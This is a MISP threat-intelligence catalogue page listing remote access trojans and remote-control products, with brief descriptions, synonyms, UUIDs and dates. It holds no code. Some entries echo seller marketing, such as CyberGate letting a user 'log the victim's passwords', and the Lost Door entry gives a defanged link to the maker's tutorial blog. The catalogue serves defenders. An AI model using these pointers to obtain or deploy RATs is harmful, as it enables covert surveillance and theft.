Skip to content

Hide Navigation Hide TOC

Edit

RAT

remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system.

Authors
Authors and/or Contributors
Various
raw-data

Iperius Remote

Iperius Remote is advertised with these features: Control remotely any computer with Iperius Remote Desktop Free. For remote support or presentations. Ideal for technical assistance. Easy to use and secure.

Internal MISP references

UUID 5abe8673-4f85-440b-8860-de39fc1b671c which can be used as unique global reference for Iperius Remote in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

TeamViewer

TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

Internal MISP references

UUID 8ee3c015-3088-4a5f-8c94-602c27d767c0 which can be used as unique global reference for TeamViewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

JadeRAT

JadeRAT is just one example of numerous mobile surveillanceware families we've seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage.

Internal MISP references

UUID 1cc8963b-5ad4-4e19-8e9a-57b0ff1ef926 which can be used as unique global reference for JadeRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
cfr-suspected-state-sponsor China
cfr-suspected-victims ['Ethnic minorities in China']
cfr-target-category ['Government', 'Civil society']
cfr-type-of-incident Espionage
Related clusters

To see the related clusters, click here.

Back Orifice

Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Back Orifice.

Known Synonyms
BO
Internal MISP references

UUID 20204b13-8ad1-4147-9328-0a9a7ac010b6 which can be used as unique global reference for Back Orifice in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Netbus

NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Netbus.

Known Synonyms
NetBus
Internal MISP references

UUID 81ff6e46-0ba4-458b-b3b0-750e86404cae which can be used as unique global reference for Netbus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

PoisonIvy

Poison Ivy is a RAT which was freely available and first released in 2005.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoisonIvy.

Known Synonyms
Backdoor.Win32.PoisonIvy
Gen:Trojan.Heur.PT
Poison Ivy
Internal MISP references

UUID 4e104fef-8a2c-4679-b497-6e86d7d47db0 which can be used as unique global reference for PoisonIvy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Sub7

Sub7, or SubSeven or Sub7Server, is a Trojan horse program.[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman. Mobman has not maintained or updated the software since 2004, however an author known as Read101 has carried on the Sub7 legacy.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sub7.

Known Synonyms
Sub7Server
SubSeven
Internal MISP references

UUID d7369f05-65ce-4e10-916f-41f2f6d4ab59 which can be used as unique global reference for Sub7 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1999

Beast Trojan

Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.

Internal MISP references

UUID 268a4f81-dbfd-4b20-9a54-24eba7a4c781 which can be used as unique global reference for Beast Trojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Bifrost

Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).

Internal MISP references

UUID eb62bac0-68fd-4b17-af4f-89c6900ee414 which can be used as unique global reference for Bifrost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004

Blackshades

Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely. The malware targets computers using Microsoft Windows -based operating systems.[2] According to US officials, over 500,000 computer systems have been infected worldwide with the software.

Internal MISP references

UUID 3a1fc564-3705-4cc0-8f80-13c58d470d34 which can be used as unique global reference for Blackshades in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010
Related clusters

To see the related clusters, click here.

DarkComet

DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkComet.

Known Synonyms
Dark Comet
Internal MISP references

UUID 8a21ae06-d257-48a0-989b-1c9aebedabc2 which can be used as unique global reference for DarkComet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008
Related clusters

To see the related clusters, click here.

Lanfiltrator

Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.

Internal MISP references

UUID 826e73f8-2241-4c99-848d-8597d685cfd3 which can be used as unique global reference for Lanfiltrator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Win32.HsIdir

Win32.HsIdir is an advanced remote administrator tool systems was done by the original author HS32-Idir, it is the development of the release made since 2006 Copyright © 2006-2010 HS32-Idir.

Internal MISP references

UUID 569d539f-f949-4156-8896-108ea8352fbc which can be used as unique global reference for Win32.HsIdir in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Optix Pro

Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K

Internal MISP references

UUID 4ce3247b-203a-42a8-aaa0-05558c50894e which can be used as unique global reference for Optix Pro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Back Orifice 2000

Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft BackOffice Server software. Back Orifice 2000 is a new version of the famous Back Orifice backdoor trojan (hacker's remote access tool). It was created by the Cult of Dead Cow hackers group in July 1999. Originally the BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with CIH virus, so the people who got that CD might get infected and spread not only the compiled backdoor, but also the CIH virus.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Back Orifice 2000.

Known Synonyms
BO2k
Internal MISP references

UUID 91f8a1d8-c816-45e1-8c26-17a7305ca375 which can be used as unique global reference for Back Orifice 2000 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

RealVNC

The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RealVNC.

Known Synonyms
VNC Connect
VNC Viewer
Internal MISP references

UUID e1290288-84d4-4b32-858d-db4ed612de44 which can be used as unique global reference for RealVNC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Adwind RAT

Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Adwind RAT.

Known Synonyms
AlienSpy
Frutas
JBifrost
Jsocket
UNRECOM
UNiversal REmote COntrol Multi-Platform
Unrecom
Internal MISP references

UUID b76d9845-815c-4e77-9538-6b737269da2f which can be used as unique global reference for Adwind RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011
Related clusters

To see the related clusters, click here.

Albertino Advanced RAT

Internal MISP references

UUID eff22ed3-81fc-4055-bd1d-76e1f191f487 which can be used as unique global reference for Albertino Advanced RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Arcom

The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.

Internal MISP references

UUID cd167b01-dc63-4576-b4a1-5ee707aa392b which can be used as unique global reference for Arcom in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BlackNix

BlackNix rat is a rat coded in delphi.

Internal MISP references

UUID f3e79212-0e35-40d2-a1d6-37b629a8138e which can be used as unique global reference for BlackNix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Blue Banana

Blue Banana is a RAT (Remote Administration Tool) created purely in Java

Internal MISP references

UUID 9b515229-36f6-4b93-9889-36116a12fd74 which can be used as unique global reference for Blue Banana in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

Bozok

Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.

Internal MISP references

UUID 41f45758-0376-42a8-bc07-8f2ffbee3ad2 which can be used as unique global reference for Bozok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013
Related clusters

To see the related clusters, click here.

ClientMesh

ClientMesh is a Remote Administration Application yhich allows a user to control a number of client PCs from around the world.

Internal MISP references

UUID 03eb6742-9a17-4aed-95e4-d8a0b0abefc3 which can be used as unique global reference for ClientMesh in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

CyberGate

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen.

Internal MISP references

UUID c3cf4e88-704b-4d7c-8185-ee780804f3d3 which can be used as unique global reference for CyberGate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011
Related clusters

To see the related clusters, click here.

Dark DDoSeR

Internal MISP references

UUID 3c026104-6129-4749-9b41-07c28d9e84c4 which can be used as unique global reference for Dark DDoSeR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkRat

In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as ‘Dark RAT’ – a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkRat.

Known Synonyms
DarkRAT
Internal MISP references

UUID 7135cc9c-a7bf-44fc-b74b-80de9edd9438 which can be used as unique global reference for DarkRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2005

Greame

Internal MISP references

UUID e880a029-bb01-4a64-baa3-b13fc2af4e9d which can be used as unique global reference for Greame in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

HawkEye

HawkEye is a popular RAT that can be used as a keylogger, it is also able to identify login events and record the destination, username, and password.

Internal MISP references

UUID 8414f79c-a879-44b6-b154-4992aa12dff1 which can be used as unique global reference for HawkEye in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2003

jRAT

jRAT is the cross-platform remote administrator tool that is coded in Java, Because its coded in Java it gives jRAT possibilities to run on all operation systems, Which includes Windows, Mac OSX and Linux distributions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular jRAT.

Known Synonyms
JacksBot
Internal MISP references

UUID 1df62d96-88f8-473c-94a2-252eb360ba62 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

jSpy

jSpy is a Java RAT.

Internal MISP references

UUID 669a0e4d-9760-49fc-bdf5-0471f84e0c76 which can be used as unique global reference for jSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013
Related clusters

To see the related clusters, click here.

LuxNET

Just saying that this is a very badly coded RAT by the biggest skid in this world, that is XilluX. The connection is very unstable, the GUI is always flickering because of the bad Multi-Threading and many more bugs.

Internal MISP references

UUID aad1038d-4d50-4a3e-88f3-cd9d154dc45c which can be used as unique global reference for LuxNET in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

NJRat

NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NJRat.

Known Synonyms
Njw0rm
Internal MISP references

UUID 7fb493bb-756b-42a2-8f6d-59e254f4f2cc which can be used as unique global reference for NJRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Pandora

Remote administrator tool that has been developed for Windows operation system. With advanced features and stable structure, Pandora’s structure is based on advanced client / server architecture. was configured using modern technology.

Internal MISP references

UUID 59485642-d233-4167-9f51-bd1d74285c23 which can be used as unique global reference for Pandora in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Predator Pain

Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Predator Pain.

Known Synonyms
PredatorPain
Internal MISP references

UUID 42a97a5d-ee33-492a-b20f-758ecdbf1aed which can be used as unique global reference for Predator Pain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Punisher RAT

Remote administration tool

Internal MISP references

UUID e49af83c-fd2f-4540-92dc-97c7b84a9458 which can be used as unique global reference for Punisher RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007

SpyGate

This is tool that allow you to control your computer form anywhere in world with full support to unicode language.

Internal MISP references

UUID 1c3df89a-1f30-4ccb-acb4-5dee4b470b55 which can be used as unique global reference for SpyGate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Small-Net

RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Small-Net.

Known Synonyms
SmallNet
Internal MISP references

UUID 1dd0c7f8-a6fb-4912-9de9-deb43f384fdb which can be used as unique global reference for Small-Net in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Vantom

Vantom is a free RAT with good option and very stable.

Internal MISP references

UUID 6e5a1fcb-f730-4d8d-890a-ef133782a7d2 which can be used as unique global reference for Vantom in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Xena

Xena RAT is a fully-functional, stable, state-of-the-art RAT, coded in a native language called Delphi, it has almost no dependencies.

Internal MISP references

UUID b9d5ab11-dd6f-49ba-8117-ce16f71ff11c which can be used as unique global reference for Xena in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

XtremeRAT

This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.

Internal MISP references

UUID 3b6b55fb-595c-40c5-bbc5-dbe244b15026 which can be used as unique global reference for XtremeRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Netwire

NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.

Internal MISP references

UUID e3113a0e-a65b-4119-8bc2-1c8d9d18c2db which can be used as unique global reference for Netwire in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

Gh0st RAT

Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into some of the most sensitive computer networks on Earth. It is a cyber spying computer program. .

Internal MISP references

UUID 255a59a7-db2d-44fc-9ca9-5859b65817c3 which can be used as unique global reference for Gh0st RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2001
Related clusters

To see the related clusters, click here.

Plasma RAT

Plasma RAT’s stub is fairly advanced, having many robust features. Some of the features include botkilling, Cryptocurrencies Mining (CPU and GPU), persistence, anti-analysis, torrent seeding, AV killer, 7 DDoS methods and a keylogger. The RAT is coded in VB.Net. There is also a Botnet version of it (Plasma HTTP), which is pretty similar to the RAT version.

Internal MISP references

UUID af534ddb-d0c6-47c0-82be-058c8bd5c6e1 which can be used as unique global reference for Plasma RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Babylon

Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++ which is an ideal language for high performance and the client is developed in C#(.Net Framework 4.5)

Internal MISP references

UUID ad1c9a50-3cd2-446a-ab31-9ecb62980d61 which can be used as unique global reference for Babylon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Imminent Monitor

RAT

Internal MISP references

UUID f52a5252-ef53-4935-81c8-96fffcd1b952 which can be used as unique global reference for Imminent Monitor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DroidJack

DroidJack is a RAT (Remote Access Trojan/Remote Administration Tool) nature of remote accessing, monitoring and managing tool (Java based) for Android mobile OS. You can use it to perform a complete remote control to any Android devices infected with DroidJack through your PC. It comes with powerful function and user-friendly operation – even allows attackers to fully take over the mobile phone and steal, record the victim’s private data wilfully.

Internal MISP references

UUID 7f032293-bfa2-4595-803d-c84519190861 which can be used as unique global reference for DroidJack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Quasar RAT

Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface

Internal MISP references

UUID 6efa425c-3731-44fd-9224-2a62df061a2d which can be used as unique global reference for Quasar RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014
Related clusters

To see the related clusters, click here.

Dendroid

Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early of 2014 by Symantec and appeared in the underground for sale for $300. Some things were noted in Dendroid, such as being able to hide from emulators at the time. When first discovered in 2014 it was one of the most sophisticated Android remote administration tools known at that time. It was one of the first Trojan applications to get past Google's Bouncer and caused researchers to warn about it being easier to create Android malware due to it. It also seems to have follow in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appeared to be leaked somewhere around 2014. It was noted that an apk binder was included in the leak, which provided a simple way to bind Dendroid to legitimate applications.

Internal MISP references

UUID ea3a8c25-4adb-4538-bf11-55259bdba15f which can be used as unique global reference for Dendroid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014
Related clusters

To see the related clusters, click here.

Ratty

A Java R.A.T. program

Internal MISP references

UUID a51f07ae-ab2c-45ee-aa9c-1db7873e7bb4 which can be used as unique global reference for Ratty in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

RaTRon

Java RAT

Internal MISP references

UUID 48b6886b-67a9-4815-92a2-1b7aca24d4ac which can be used as unique global reference for RaTRon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Arabian-Attacker RAT

Internal MISP references

UUID f966a936-19f9-4b6b-95b3-0ff102e26303 which can be used as unique global reference for Arabian-Attacker RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2006

Androrat

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

Internal MISP references

UUID ce70bf96-0629-4c7d-8ed8-2315fab0ed42 which can be used as unique global reference for Androrat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Adzok

Remote Administrator

Internal MISP references

UUID 3560c833-3d28-4888-b0b8-1951ecac57a2 which can be used as unique global reference for Adzok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Schwarze-Sonne-RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Schwarze-Sonne-RAT.

Known Synonyms
SS-RAT
Schwarze Sonne
Internal MISP references

UUID 99860df7-565d-47e4-a086-c4af1623b626 which can be used as unique global reference for Schwarze-Sonne-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Cyber Eye RAT

Internal MISP references

UUID 729f1b02-ce0c-41a4-8d4e-c7c1f5475c4b which can be used as unique global reference for Cyber Eye RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Batch NET

Internal MISP references

UUID 9501172b-a81a-49bb-90ce-31f2fb78a130 which can be used as unique global reference for Batch NET in MISP communities and other software using the MISP galaxy

RWX RAT

Internal MISP references

UUID 62c5b489-8750-4fab-aca3-b233af789831 which can be used as unique global reference for RWX RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Spynet

Spy-Net is a software that allow you to control any computer in world using Windows Operating System.He is back using new functions and good options to give you full control of your remote computer.Stable and fast, this software offer to you a good interface, creating a easy way to use all his functions

Internal MISP references

UUID 66bfd62e-6626-4104-af37-a44244204ac8 which can be used as unique global reference for Spynet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

CTOS

Internal MISP references

UUID b9d7d5b8-7cf4-4650-a88a-5f4e991c45d6 which can be used as unique global reference for CTOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Virus RAT

Internal MISP references

UUID 9107fc0d-6705-4fc2-b621-e5ac42afef90 which can be used as unique global reference for Virus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Atelier Web Remote Commander

Internal MISP references

UUID c51188d6-d489-4a18-a9a8-e38365f0bc10 which can be used as unique global reference for Atelier Web Remote Commander in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

drat

A distributed, parallelized (Map Reduce) wrapper around Apache™ RAT to allow it to complete on large code repositories of multiple file types where Apache™ RAT hangs forev

Internal MISP references

UUID 5ee39172-7ba3-477c-9772-88841b4be691 which can be used as unique global reference for drat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

MoSucker

MoSucker is a powerful backdoor - hacker's remote access tool.

Internal MISP references

UUID 611ed43b-b869-4419-a487-6f7393125eb3 which can be used as unique global reference for MoSucker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Theef

Internal MISP references

UUID f5154f40-46c1-4a0d-9814-cb5e5adf201b which can be used as unique global reference for Theef in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

ProRat

ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).

Internal MISP references

UUID cae67963-63d2-4c8b-8358-a03556f20b7b which can be used as unique global reference for ProRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Setro

Internal MISP references

UUID 6b1b2415-b42f-41c4-8c35-077844a9c4dc which can be used as unique global reference for Setro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Indetectables RAT

Internal MISP references

UUID 36912ecf-9411-44fa-b14d-ec3b6896b0e2 which can be used as unique global reference for Indetectables RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Internal MISP references

UUID 0f2c6cd4-675a-4c41-acf5-1b0bc3625375 which can be used as unique global reference for Luminosity Link in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Orcus

Internal MISP references

UUID 30a1a10e-4155-43a6-854a-3b43bc2a3f9c which can be used as unique global reference for Orcus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Blizzard

Internal MISP references

UUID a7e4c2ff-6747-48e4-99c4-5c638c167fc0 which can be used as unique global reference for Blizzard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Kazybot

Internal MISP references

UUID 6c553273-f3f8-4e66-b764-9a9ae83a2f35 which can be used as unique global reference for Kazybot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BX

Internal MISP references

UUID f6cc85de-81da-4276-a87c-45e3a00b67b5 which can be used as unique global reference for BX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014

death

Internal MISP references

UUID b7095617-3320-4118-9f28-7d4356e2571a which can be used as unique global reference for death in MISP communities and other software using the MISP galaxy

Sky Wyder

Internal MISP references

UUID 866f97d7-faa9-49e2-b704-7406c1ee2565 which can be used as unique global reference for Sky Wyder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkTrack

Internal MISP references

UUID f60dc9e3-2053-446c-89a0-ad69906de6e4 which can be used as unique global reference for DarkTrack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

xRAT

Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote Administration Tool coded in C# (using .NET Framework 2.0).

Internal MISP references

UUID 509aff15-ba17-4582-b1a0-b0ed89df01d8 which can be used as unique global reference for xRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

To see the related clusters, click here.

Biodox

Internal MISP references

UUID 43e91752-23f5-41c6-baa3-74d6fc0f2cad which can be used as unique global reference for Biodox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Offence

Offense RAT is a free renote administration tool made in Delphi 9.

Internal MISP references

UUID a9caa398-ba8b-4a64-8970-67761c7efc76 which can be used as unique global reference for Offence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Apocalypse

Internal MISP references

UUID d5d3f9de-21b5-482e-b716-5f2f13182990 which can be used as unique global reference for Apocalypse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2009
Related clusters

To see the related clusters, click here.

JCage

Internal MISP references

UUID 0d756293-6cbc-4973-8df8-7d6ab0cd51e0 which can be used as unique global reference for JCage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013

Nuclear RAT

Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).

Internal MISP references

UUID 1b0f4481-f205-493a-a167-59669a64b6fc which can be used as unique global reference for Nuclear RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Ozone

C++ REMOTE CONTROL PROGRAM

Internal MISP references

UUID 1a4d6958-45fe-41ca-b545-bdf28fba14fa which can be used as unique global reference for Ozone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Xanity

Internal MISP references

UUID 66c3e21d-1cb9-43b4-bd1b-2d9ac839a628 which can be used as unique global reference for Xanity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkMoon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkMoon.

Known Synonyms
Dark Moon
Internal MISP references

UUID 18a4e501-c6e3-45e9-beee-25421b0c7bcb which can be used as unique global reference for DarkMoon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value

Xpert

Internal MISP references

UUID bdb25a20-4c6c-4fdb-ac05-5f81fb6c15a7 which can be used as unique global reference for Xpert in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Kiler RAT

This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell. From stealing credentials stored in browsers to accessing the victims webcam. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread utilizing physic devices, such as USB drives, but also to use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well known njrat, as they share many similar features such as their display style, several abilities and a general template for communication methods . However, where njrat left off KilerRat has taken over. KilerRat is a very feature rich RAT with an active development force that is rapidly gaining in popularity amongst the middle eastern community and the world.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kiler RAT.

Known Synonyms
Njw0rm
Internal MISP references

UUID c01ef312-dfd6-403f-a8b5-67fc11a550a7 which can be used as unique global reference for Kiler RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Brat

Internal MISP references

UUID 7109e2b0-8c05-4d2b-a37f-c00d799f0c02 which can be used as unique global reference for Brat in MISP communities and other software using the MISP galaxy

MINI-MO

Internal MISP references

UUID 32ea7a67-9649-4bd3-b194-f37f04c208ba which can be used as unique global reference for MINI-MO in MISP communities and other software using the MISP galaxy

Lost Door

Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It’s promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT is found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lost Door.

Known Synonyms
LostDoor
Internal MISP references

UUID 8007f2be-ba4f-445e-8a15-6c2bfe769c49 which can be used as unique global reference for Lost Door in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Loki RAT

